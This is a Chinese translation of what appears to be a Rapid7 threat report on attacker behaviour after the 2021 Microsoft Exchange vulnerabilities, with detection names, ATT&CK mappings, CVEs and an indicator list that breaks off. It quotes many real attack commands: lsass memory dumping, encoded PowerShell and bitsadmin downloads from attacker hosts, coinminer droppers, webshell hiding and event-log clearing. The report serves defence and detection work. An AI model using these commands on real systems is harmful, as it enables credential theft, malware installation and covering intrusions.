微软Exchange漏洞攻击者行为分析

admin 2021年3月26日08:13:29评论203 views字数 22282阅读74分16秒阅读模式

最近几周,想必大家都有听过有关于HAFNIUM组织攻击利用Microsoft’s Exchange Server漏洞的报道。这些漏洞的反响如此广范主要原因之一是因为,它们允许攻击者直接从公共互联网进入到受害者系统,接管受害主机的SYSTEM权限用户并执行操作。

微软Exchange漏洞攻击者行为分析


由于此服务在默认情况下以最高级别的权限运行,因此应该对其进行加固并接收其他级别的管控。这种默认配置没有使用最小特权的原则,并且由于创建这些web应用程序的目的是向公共internet公开,并且不受诸如网络访问控制列表之类的其他基本方法的保护,因此会变得更加危险。除此之外,这些易受攻击的服务器还提供内部整个组织大量用户哈希/密码和电子邮件收件箱内容的直接访问途径。这通常也是攻击者在受害者环境中追求的最直接的方法之一。

虽然公布了一些已被利用的系统报告,为一部分人敲响了警钟,但在信息安全行业中,这种apt事件已经被许多人“盯梢”了多年。不同类型的攻击者都在频繁地寻求利用受害者向公共互联网提供的网络服务。通常,这些服务位于各种边缘设备上,这些设备是专门设计用来放置并向公共internet公开的。这可能会带来许多挑战,因为这些边界业务可能是设备、防火墙或不支持运行额外的安全相关软件(如端点检测和响应)的其他设备。这些设备通常也不属于标准的补丁管理系统。据Rapid7了解,现在从漏洞披露到产生可大规模利用的漏洞工具的速度有所提高,这使得受害者几乎没有时间测试和部署补丁,且受害者也不能随时对提供关键任务服务的系统进行变更控制。


微软Exchange漏洞攻击者行为分析

在过去的几年中,Rapid7观察到一些不同的攻击者试图快速直接访问受害者的系统,以收集密码、执行加密劫持、分发勒索软件和/或窃取数据。攻击者通常会将目标锁定在组织的特定高级成员或员工的邮箱中,研究他们感兴趣且敏感的主题内容上。这些攻击者用来获得受害人信息的最简单的方法是通过远程桌面协议向公共internet提供远程访问服务的系统进行简单的密码喷射攻击。更“机智”的攻击者利则用了像Citrix Netscaler、Progress公司的Telerik和Pulse Secure公司的Pulse Connect Secure等最近出现的漏洞,仅做举例。


微软Exchange漏洞攻击者行为分析

虽然对于如何进入受害者的网络的方法可能不同,从互联网可访问服务的各种攻击类型到网络钓鱼,同一种攻击方式攻击者可以保持多年内不变。原因是,在受害者的系统内本身存在的缺陷很少有人认真关注,它们一直对攻击者非常有效。继续采用使用操作系统中预先存在的实用程序的“就地生存”技术,使得防病毒或应用程序控制都不太可能捕捉和阻拦攻击者。此外,对于攻击者来说,这还可以释放或减少对开发漏洞利用程序和工具集的技术资源的需求。

因为攻击者的动作和行为可以长时间维持不变,Rapid7威胁情报和检测工程(TIDE)团队不断与我们的检测和响应管理安全操作中心以及事件响应团队持续合作,以开发和更新我们InsightIDR对攻击者的行为分析,确保所有的客户可及时了解攻击者采用的最新的策略,技术和程序。这使无论攻击者是否利用的是未知漏洞,我们的客户都可以收到有关攻击者行为的警报,并确保他们的业务安全。

最后,非常重要的是不要单纯的以为只有一个攻击者在利用这些新的漏洞。很有可能它是个“多人运动”在同时利用相同的弱点,并伴随有各种不同类型的后续渗透。在没有确凿证据的情况下,宣称它们之间存在联系充其量也只是是一种推测。

Tips以低权限帐户运行是一种很好的安全做法,因为这样一来,恶意用户就不能利用软件漏洞来接管整个系统。


HAFNIUM都干了啥

过使用我们现有的检测,Rapid7观察到有攻击者使用China Chopper 攻击了9个不同的受害者,其中包括制造业、医疗保健、公用事业提供商等。这种攻击行为与HAFNIUM的行为有很大重叠,Rapid7的Insight Agent从2021年2月27日至2021年3月7日收集的数据中就观察到了这种行为。应该注意的是,攻击者使用客户端通过ChinaChopper 生成过程的方式至少自2013年以来几乎没有改变。这些命令行参数非常明显,在包含命令行参数的日志中很容易找到。这意味着根据这些模式开发的检测有可能有效寿命长达十年以上。

Base64-decoded parameters z1 and z2:z1=cmdz2=cd /d “c:inetpubwwwroot”&whoami&echo [S]&cd&echo [E]


资料来源:

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf

Rapid7基于此攻击者行为的审查开发了其他检测方法。我们注意到,默认情况下,当为Microsoft Exchange的Outlook Web Access配置IIS时,它有一个环境变量的值将设置为:

APP_POOL_ID=MSExchangeOWAAppPool

有了这些资料,再通过InsightAgent收集这些数据,并且能够使用InsightIDR的攻击者行为分析对其进行评估,TIDE团队能够编写一个检测模块,在执行任何进程时,只要子进程或父进程的环境变量和值与之匹配,就可以进行匹配告警。这使得我们不仅可以找到已知的China Chopper的用途,还可以找到其他几个攻击者是如何使用不同的技术利用此漏洞的。

攻击者使用ChinaChopper对lsass.exe进程执行MicrosoftSysinternals实用程序procdump64.exe,将其内存内容复制到磁盘上的文件中。这使攻击者以后可以使用诸如mimikatz之类的实用程序来检索和分析此内存转储,以从此过程的内存转储中提取密码。如果未采用双因素身份验证,则此攻击者有可能在以后的时间内再次使用这些受害者电子邮件帐户中的帐户信息。此外,即使在这些受害者位置实施了合理的密码更改策略,用户也经常会以可预测的方式轮换使用密码。例如,如果用户的密码为“ ThisIsMyPassword1!”,则在被迫更改时,他们可能只会将末尾的数字递增为“ ThisIsMyPassword2!”。这使攻击者可以轻松地根据人类行为的可预测性猜测未来的密码。

通过Rapid7的观察发现HAFNIUM执行过以下代码:

Procudmp.exe程序通过China Chopper webshell执行的命令,用于写入lsass.exe文件进程到磁盘:

cmd /c cd /d C:\root&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E]cmd /c cd /d E:\logs&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E]

通过China Chopperwebshell执行侦察命令,以收集有关Active Directory域控制器、用户、系统和进程的信息:

cmd /c cd /d "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth&HOSTNAME" & nltest /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]cmd /c cd /d "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth&nltest" /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]cmd /c cd /d "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth&HOSTNAME" & whoami & nltest /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]cmd /c cd /d c:\temp&tasklist&echo [S]&cd&echo [E]cmd /c cd /d E:\logs&tasklist &echo [S]&cd&echo [E]cmd /c cd /d C:inetpubwwwrootaspnet_clientsystem_web&net group "Domain computers" /do&echo [S]&cd&echo [E]cmd /c cd /d C:inetpubwwwrootaspnet_clientsystem_web&tasklist /v&echo [S]&cd&echo [E]


进一步列举关于受害者系统中特定进程信息。进程smex_master.exe来自趋势科技的ScanMail, unsecapp.exe来自Microsoft Windows。

cmd /c cd /d C:inetpubwwwrootaspnet_clientsystem_web&wmic process where name=smex_master.exe get ExecutablePath,commandline&echo [S]&cd&echo [E]cmd /c cd /d C:inetpubwwwrootaspnet_clientsystem_web&wmic process where name=unsecapp.exe get ExecutablePath&echo [S]&cd&echo [E]cmd /c cd /d C:inetpubwwwrootaspnet_clientsystem_web&wmic process where name=unsecapp.exe get processid&echo [S]&cd&echo [E]


使用通过ChinaChopper 执行的net.exe命令删除ActiveDirectory中的组:

cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&net group "Exchange Organization administrators" administrator /del /domain&echo [S]&cd&echo [E]

通过China Chopper 执行网络连接检查和/或出口IP地址枚举命令:

cmd /c cd /d "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth&ping" -n 1 <REDACTED_HOSTNAME>&echo [S]&cd&echo [E]cmd /c cd /d "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth&ping" -n 1 <REDACTED_HOSTNAME>&echo [S]&cd&echo [E]cmd /c cd /d C:inetpubwwwroot&ping -n 1 8.8.8.8&echo [S]&cd&echo [E]cmd /c cd /d C:inetpubwwwrootaspnet_clientsystem_web&c:windowstempcurl.exe -m 10 ipinfo.io&echo [S]&cd&echo [E]cmd /c cd /d C:inetpubwwwrootaspnet_clientsystem_web&c:windowstempcurl.exe -vv -k -m 10 https://www.google.com > C:windowstempb.log 2>&1&echo [S]&cd&echo [E]cmd /c cd /d C:inetpubwwwrootaspnet_clientsystem_web&ping -n 1 ipinfo.io&echo [S]&cd&echo [E]cmd /c cd /d C:inetpubwwwrootaspnet_clientsystem_web&ping -n 1 www.google.com&echo [S]&cd&echo [E]cmd /c cd /d c:\temp&ping www.google.com&echo [S]&cd&echo [E]


通过China Chopper 执行的第二阶段有效载荷检索命令:

cmd /c cd /d C:\inetpub\wwwroot\aspnet_client&msiexec /q /i http://103.212.223.210:9900/nvidia.msi&echo [S]&cd&echo [E]

通过China Chopperwebshell执行的文件系统交互命令,用于搜索文件内容、隐藏和删除文件:

cmd /c cd /d C:inetpubwwwrootaspnet_clientsystem_web&findstr Request "\<REDACTED_HOSTNAME>C$Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauthErrorFF.aspx&echo" [S]&cd&echo [E]cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&attrib +h +s +r OutlookEN.aspx&echo [S]cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&attrib +h +s +r TimeoutLogout.aspx&echo [S]cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&del 'E:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauthOutlookEN.aspx'&echo [S]cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&del 'E:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauthTimeoutLogout.aspx'&echo [S]

InsightIDR攻击者行为分析可检测此攻击者的活动:

  • 可疑进程-Outlook Web Access生成的进程

  • 攻击者技术-Net命令删除Exchange管理组

  • 攻击者工具-China Chopper Webshell执行命令

  • 攻击者技术-针对LSASS使用ProcDump



在与HAFNIUM有关的活动中观察到的MITRE ATT&CK 技术

  • T1003 - 操作系统凭据倾销

    https://attack.mitre.org/techniques/T1003/

  • T1003.001 - 操作系统凭据倾销:LSASS 内存https://attack.mitre.org/techniques/T1003/001/

  • T1005 - 来自本地系统的数据

    https://attack.mitre.org/techniques/T1005/

  • T1007 - 系统服务发现

    https://attack.mitre.org/techniques/T1007/

  • T1033 - 系统所有者/用户发现

    https://attack.mitre.org/techniques/T1033/

  • T1041 - 通过 C2 通道进行渗透

    https://attack.mitre.org/techniques/T1041/

  • T1047 - 窗口管理仪器

    https://attack.mitre.org/techniques/T1047/

  • T1057 - 过程发现

    https://attack.mitre.org/techniques/T1057/

  • T1059 - 命令和脚本口译员

    https://attack.mitre.org/techniques/T1059/

  • T1059.003 - 命令和脚本口译员:视窗命令外壳https://attack.mitre.org/techniques/T1059/003/

  • T1071 - 应用层协议

    https://attack.mitre.org/techniques/T1071/

  • T1071.001 - 应用层协议:Web 协议

    https://attack.mitre.org/techniques/T1071/001/

  • T1074 - 数据分阶段

    https://attack.mitre.org/techniques/T1074/

  • T1074.001 - 数据分阶段:本地数据分期https://attack.mitre.org/techniques/T1074/001/

  • T1083 - 文件和目录发现

    https://attack.mitre.org/techniques/T1083/

  • T1087 - 帐户发现

    https://attack.mitre.org/techniques/T1087/

  • T1087.001 - 帐户发现:本地帐户

    https://attack.mitre.org/techniques/T1087/001/

  • T1087.002 - 帐户发现:域名帐户

    https://attack.mitre.org/techniques/T1087/002/

  • T1098 - 帐户操作

    https://attack.mitre.org/techniques/T1098/

  • T1105 - 入口工具传输

    https://attack.mitre.org/techniques/T1105/

  • T1190 - 利用面向公众的应用程序

    https://attack.mitre.org/techniques/T1190/

  • T1203 - 开发客户执行

    https://attack.mitre.org/techniques/T1203/

  • T1218 - 已签名的二进制代理执行

    https://attack.mitre.org/techniques/T1218/

  • T1218.007 - 已签名的二进制代理执行:Msiexec

    https://attack.mitre.org/techniques/T1218/007/

  • T1505 - 服务器软件组件

    https://attack.mitre.org/techniques/T1505/

  • T1505.003 - 服务器软件组件:网络壳

    https://attack.mitre.org/techniques/T1505/003/

  • T1518 - 软件发现

    https://attack.mitre.org/techniques/T1518/

  • T1518.001 - 软件发现:安全软件发现

    https://attack.mitre.org/techniques/T1518/001/

  • T1531 - 帐户访问删除

    https://attack.mitre.org/techniques/T1531/

  • T1583 - 获取基础设施

    https://attack.mitre.org/techniques/T1583/

  • T1583.003 - 获取基础设施:虚拟专用服务器https://attack.mitre.org/techniques/T1583/003/

  • T1587 - 开发功能

    https://attack.mitre.org/techniques/T1587/

  • T1587.001 - 开发功能:恶意软件

    https://attack.mitre.org/techniques/T1587/001/

  • T1587.004 - 开发功能:漏洞

    https://attack.mitre.org/techniques/T1587/004/

  • T1588 - 获取功能

    https://attack.mitre.org/techniques/T1588/

  • T1588.001 - 获取功能:恶意软件

    https://attack.mitre.org/techniques/T1588/001/

  • T1588.002 - 获取功能:工具

    https://attack.mitre.org/techniques/T1588/002/

  • T1588.005 - 获取功能:漏洞

    https://attack.mitre.org/techniques/T1588/005/

  • T1588.006 - 获取功能:漏洞

    https://attack.mitre.org/techniques/T1588/006/

  • T1595 - 主动扫描

    https://attack.mitre.org/techniques/T1595/

  • T1595.001 - 主动扫描:扫描 IP 块

    https://attack.mitre.org/techniques/T1595/001/

  • T1595.002 - 主动扫描:漏洞扫描

  • https://attack.mitre.org/techniques/T1595/002/


于HAFNIUM不相关的活动

Rapid7 还观察到除HAFNIUM之外的部分攻击者在最近几周对这些Exchange漏洞进行了其他几种不同类型后渗透攻击尝试。我们已将这些命令分组,并将会被执行的独特类型的命令提炼到如下所示的各个部分中。


Minidump 和 Makecab 攻击

发现此攻击者上传批量脚本来执行 Microsoft 实用程序 dsquery .exe以列举活动目录域中的所有用户。攻击者还可能将comsvcs.dll中的Minidump功能与rundll32.exe一起使用 以便将lsass.exe进程的内存写入磁盘。然后,攻击者使用现有的Microsoft实用程序makecab.exe压缩内存转储,以更有效地进行检索。总体而言,该攻击者在对受害者进行数据收集的过程中所利用的方法与其他报道该行为者的报告中讨论的数据相似,现将这些行为统称为HAFNIUM。但是,因为其所使用的工具、技术差异很大,因此如果没有其他引人注目的链接,就无法轻易将其归因于同一攻击者。

C:WindowsSystem32cmd.exe /c c:inetpubwwwrootaspnet_clienttest.batC:WindowsSystem32cmd.exe /c c:inetpubwwwrootaspnet_clienttest.batdsquery * -limit 0 -filter objectCategory=person -attr * -ucopowershell rundll32.exe c:windowssystem32comsvcs.dll MiniDump 900 c:inetpubwwwrootaspnet_client<REDACTED_33_CHARACTER_STRING>.tmp.dmp fullmakecab c:inetpubwwwrootaspnet_client<REDACTED_33_CHARACTER_STRING>.tmp.dmp c:inetpubwwwrootaspnet_client<REDACTED_33_CHARACTER_STRING>.dmp.zipmakecab c:inetpubwwwrootaspnet_client<REDACTED_33_CHARACTER_STRING>.tmp c:inetpubwwwrootaspnet_client<REDACTED_33_CHARACTER_STRING>.dmp.zip

用于检测此攻击者活动的InsightIDR攻击者行为分析:

  • 可疑进程-Outlook WebAccess产生的进程

  • 攻击者技术-通过COM Services DLL的Minidump


恶意DLL攻击

到该攻击者通过rundll32.exe上传和执行DLL,并将输出重定向到文本文件。人们相信demo.dll文件具有与mimikatz或其他哈希/密码转储实用程序类似的功能。攻击者还利用net,netstat和tasklist实用程序以及klist来显示缓存的Kerberos票证。这再次与HAFNIUM收集的数据类型有些重叠,但是这样做的方法不同。另外,这是攻击者通常都会采取的操作。

c:windowssystem32cmd.exe /c tasklisttasklistc:windowssystem32cmd.exe /c net time /donet time /doc:windowssystem32cmd.exe /c rundll32 c:programdatademo.dll,run -lm > c:programdata1.txtrundll32 c:programdatademo.dll,run -lm > c:programdata1.txtc:windowssystem32cmd.exe /c klistc:windowssystem32cmd.exe /c tasklisttasklistc:windowssystem32cmd.exe /c netstat -anonetstat -ano

InsightIDR攻击者行为分析检测这个攻击者的活动:

  • 可疑进程-Outlook Web Access产生的进程


Opera浏览器和Cobalt Strike攻击

这个攻击者通过Microsoft的BITSAdmin下载脚本。然后,这些脚本将执行经过编码的PowerShell命令,检索可以匹配Opera浏览器最新版本漏洞的DLL (CVE-2018-18913)。攻击者还会检索恶意的dll和其他文件,并将其与合法的Opera_browser.exe文件放置在同一目录中以进行执行。然后,这会将恶意代码加载到与浏览器位于同一目录中的DLL中。最终再执行Cobalt Strike(攻击者分发勒索软件最常用的工具)。

C:WindowsSystem32bitsadmin.exe /rawreturn /transfer getfile http://89.34.111.11/3.avi c:Userspublic2.batC:WindowsSystem32cmd.exe /c c:Userspublic2.batpowershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAGMAbwBkAGUAJwAsACcAQwA6AFwAdQBzAGUAcgBzAFwAcAB1AGIAbABpAGMAXABvAHAAZQByAGEAXABjAG8AZABlACcAKQA=powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBwAG4AZwAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBwAG4AZwAnACkApowershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBkAGwAbAAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBkAGwAbAAnACkAmsiexec.exe -kpowershell Start-Sleep -Seconds 10cmd /c C:\users\public\opera\opera_browser.exeC:\users\public\opera\opera_browser.exepowershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBlAHgAZQAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBlAHgAZQAnACkA
传递给PowerShell的Base64解码的字符串:
(new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/code','C:userspublicoperacode')(new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.png','C:userspublicoperaopera_browser.png')(new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.dll','C:userspublicoperaopera_browser.dll')(new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.exe','C:userspublicoperaopera_browser.exe')

用于检测此攻击者活动的InsightIDR攻击者行为分析: 

  • 可疑进程-Outlook Web Access产生的进程

  • 攻击者技术-使用后台智能传输服务下载并执行

  • 攻击者技术-URL传递给BitsAdmin


Six-character的webshell攻击

    发现此攻击者上载了webshell并将其复制到webroot中的其他位置。

cmd /c copy C:inetpubwwwrootaspnet_clientdiscover.aspx "C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauth<REDACTED_6_CHARACTER_STRING>.aspx"

用于检测此攻击者活动的InsightIDR攻击者行为分析:

  • 可疑进程-Outlook Web Access产生的进程


从攻击源下载已编码的PowerShell

    发现攻击者正在执行编码的PowerShell命令,该命令将从远程位置下载恶意软件。还会执行getmac.exe实用程序以枚举有关网络适配器的信息。

cmd.exe /c powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcAAuAGUAcwB0AG8AbgBpAG4AZQAuAGMAbwBtAC8AcAA/AGUAJwApAA==C:Windowssystem32getmac.exe /FO CSV

传递给PowerShell的Base64解码的字符串:

IEX (New-Object Net.WebClient).downloadstring('http://p.estonine.com/p?e')

用于检测此攻击者活动的InsightIDR攻击者行为分析:

  • 可疑进程-Outlook Web Access产生的进程

  • 攻击者技术-PowerShell下载


Ten-character的webshell攻击

    发现此攻击者正在上载webshell,使用icacls将webroot的目录权限设置为递归只读。此外,攻击者使用attrib.exe实用工具将包含Web Shell的文件设置标记为隐藏,并设置系统更加难以查找这些文件。

C:WindowsSystem32cmd.exe /c move "c:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaautherror.aspx" "c:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauth<REDACTED_10_CHARACTER_STRING>.aspx"C:WindowsSystem32cmd.exe /c icacls "c:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauth" /inheritance:r /grant:r Everyone:(OI)(CI)RC:WindowsSystem32cmd.exe /c =attrib "c:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauth<REDACTED_10_CHARACTER_STRING>.aspx" +s +hattrib "c:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauth<REDACTED_10_CHARACTER_STRING>.aspx" +s +hC:WindowsSystem32cmd.exe /c icacls "c:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyecpauth" /inheritance:r /grant:r Everyone:(OI)(CI)R

用于检测此攻击者活动的InsightIDR攻击者行为分析:

  • 可疑进程-Outlook Web Access产生的进程

  • 攻击者技术-修改Exchange Webroot中的文件


7zip和NetSupport Manager攻击

该攻击者使用了7zip压缩实用程序(重命名为MonitoringLog.exe)和NetSupport Manager远程访问工具(client32.exe)。这些实用程序很可能由PowerShell脚本script1.ps1检索,并位于名为Service.Information.rtf的受密码保护的存档中。提取后,将执行以下实用程序:

c:windowssystem32cmd.exe dir C:Programdatac:windowssystem32cmd.exe /c powershell C:Programdatascript1.ps1powershell C:Programdatascript1.ps1C:ProgramDataMonitoringLog.exe x -p<REDACTED_STRING> -y C:ProgramDataService.Information.rtf -oC:ProgramDataping -n 10 127.0.0.1c:windowssystem32cmd.exe /c C:ProgramdataMonitoringLog.cmdtaskkill /Im rundll32.exe /FC:ProgramDataNetConnectionsclient32.exeping -n 10 127.0.0.1taskkill /Im rundll32.exe /Fc:windowssystem32cmd.exe /c tasklist /vtasklist /v

用于检测此攻击者活动的InsightIDR攻击者行为分析:

  • 可疑进程-Outlook Web Access产生的进程


事件日志删除和虚拟目录创建攻击

    该攻击者使用Microsoft实用程序appcmd.exe在现有Webroot中创建了虚拟目录,然后使用wevtutl.exe清除了系统上的所有事件日志:

CMD C:WindowsSystem32inetsrvappcmd.exe add vdir "/app.name:Default Web Site/" "/path:/owa/auth/ /zfwqn" /physicalPath:C:ProgramDataCOMzfwqn
CMD /c for /f %x in ('wevtutil el') do wevtutil cl %xwevtutil elwevtutil cl <REDACTED_ALL_DIFFERENT_EVENT_LOGS>

用于检测此攻击者活动的InsightIDR攻击者行为分析:

  • 可疑进程-Outlook Web Access产生的进程

  • 攻击者技术-使用WEvtUtil清除事件日志


Webshell枚举攻击

发现攻击者正在执行编码的PowerShell命令,以使用type命令查看HAFNIUM和其他攻击者使用的名为Outlooken.aspx的可能的Webshell文件的内容。这可能是希望利用其他攻击者甚至研究人员在利用这些漏洞所建立的“后门程序”,简称前人栽树后人乘凉:

cmd /c powershell -enc YwBtAGQALgBlAHgAZQAgAC8AYwAgACIAdAB5AHAAZQAgACIAIgBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABFAHgAYwBoAGEAbgBnAGUAIABTAGUAcgB2AGUAcgBcAFYAMQA1AFwARgByAG8AbgB0AEUAbgBkAFwASAB0AHQAcABQAHIAbwB4AHkAXABvAHcAYQBcAGEAdQB0AGgAXABvAHUAdABsAG8AbwBrAGUAbgAuAGEAcwBwAHgAIgAiACIAcmd /c powershell -enc dAB5AHAAZQAgACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwARQB4AGMAaABhAG4AZwBlACAAUwBlAHIAdgBlAHIAXABWADEANQBcAEYAcgBvAG4AdABFAG4AZABcAEgAdAB0AHAAUAByAG8AeAB5AFwAbwB3AGEAXABhAHUAdABoAFwAbwB1AHQAbABvAG8AawBlAG4ALgBhAHMAcAB4ACIA

Base64解码字符串:

type "C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauthoutlooken.aspx

InsightIDR攻击者行为分析检测这个攻击者的活动:

  • 可疑进程- Outlook Web访问产生的进程


Coinminer dropper攻击

发现一些攻击者使用PowerShell来检索和执行coinminers。

cmd.exe /c powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/m103w.zip -OutFile C:windowstempdsf.exe & C:windowstempdsf.exe RS9+cn_0 & del C:windowstempdsf.exepowershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/m103w.zip -OutFile C:windowstempdsf.exeC:windowstempdsf.exe RS9+cn_0

多次使用以下位置检索的文件名(稍有不同的文件名):

cmd.exe /c powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/c103w-at.zip -OutFile C:windowstempdsf.exe & C:windowstempdsf.exe RS9+cn_0 & del C:windowstempdsf.exepowershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/c103w-at.zipC:windowstempdsf.exe RS9+cn_0

用于检测此攻击者活动的InsightIDR攻击者行为分析:

  • 可疑进程-Outlook Web Access产生的进程


简单侦察攻击

    发现一些攻击者执行了非常简单的侦察命令,以收集有关Active Directory中的主机,进程,用户和系统的更多信息

net group /domainnet group "Domain Computers" /donet group "Domain Users"  /donet group IntranetAdmins /donet user /domainsysteminfotasklist

另一个仅执行简单侦察类型命令的示例:

whoamisysteminfosysteminfowmic product get nameWmic product get name

用于检测此攻击者活动的InsightIDR攻击者行为分析:

  • 可疑进程-Outlook WebAccess产生的进程


结论

虽然我们知道这些漏洞在外部已经可以被利用,但这似乎仅是几个动机和技能不同的攻击者所为。Rapid7甚至观察到在两周的时间内,多个不同的角色(HAFNIUM和coinminer drops)在对同一受害者进行攻击利用。一些攻击者利用此漏洞从受害者系统中收集了密码/哈希。这使他们能够从多个受害者收集数据,只要收集到的凭证保持不变,这些数据就允许他们访问Active Directory服务。

由于攻击者意识到自己的行为会被发现,并且漏洞将很快被修补,所以在这之前相关的凭证信息的传播可能已经达到一定的规模。即使系统已成功修补,这也有可能使这些攻击者继续访问这些帐户。具有HAFNIUM的特征的文件在后来出现了被他人所利用情况,这可能表明同一个漏洞已经被共享或者泄露。在撰写本文时,Rapid7尚无确切证据,并承认此陈述具有推测性。

通过继续分析攻击者在攻击后的行为以开发出检测程序,可以大大增加被通知漏洞的可能性。这与用于获得对受害环境的初始访问权限的方法无关。此外,与大多数其他折衷指标在其他类型的公共报告中共享的情况相比,这些检测的寿命更长,并且可以更及时地提供。


观察到攻击者使用的CVE:

Common Vulnerabilities and   Exposure

Description

CVE-2018-18913

Opera  Search Order Hijacking Vulnerability https://blog.lucideus.com/2019/02/opera-search-order-hijacking-cve-2018-18913.html

CVE-2021-26855

Microsoft  Exchange Server remote code execution https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855

CVE-2021-26857

Microsoft  Exchange Server remote code execution https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26857

CVE-2021-26858

Microsoft  Exchange Server remote code execution https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26858

CVE-2021-27065

Microsoft  Exchange Server remote code execution https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065


观察到的所有攻击者使用的IOCs:

Type

Value

FQDN

estonine.com

FQDN

p.estonine.com

FQDN

ipinfo.io

Filepath

C:inetpubwwwrootaspnet_client

Filepath

C:inetpubwwwrootaspnet_clientsystem_web

Filepath

C:Program FilesMicrosoftExchange ServerV15Bin

Filepath

c:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyecpauth

Filepath

C:Program FilesMicrosoftExchange  ServerV15FrontEndHttpProxyowaauth

Filepath

C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauthCurrentthemesresources

Filepath

C:Programdata

Filepath

C:ProgramDataCOMzfwqn

Filepath

C:root

Filepath

C:UsersPublic

Filepath

C:UsersPublicOpera

Filepath

C:Windowstemp

Filename

1.txt

Filename

2.bat

Filename

3.avi

Filename

b.log

Filename

c103w-at.zip

Filename

client32.exe

Filename

code

Filename

curl.exe

Filename

demo.dll

Filename

discover.aspx

Filename

dsf.exe

Filename

error.aspx

Filename

ErrorFF.aspx

Filename

exshell.psc1

Filename

Flogon.aspx

Filename

lsass.dump

Filename

m103w.zip

Filename

nvidia.msi

Filename

opera_browser.dll

Filename

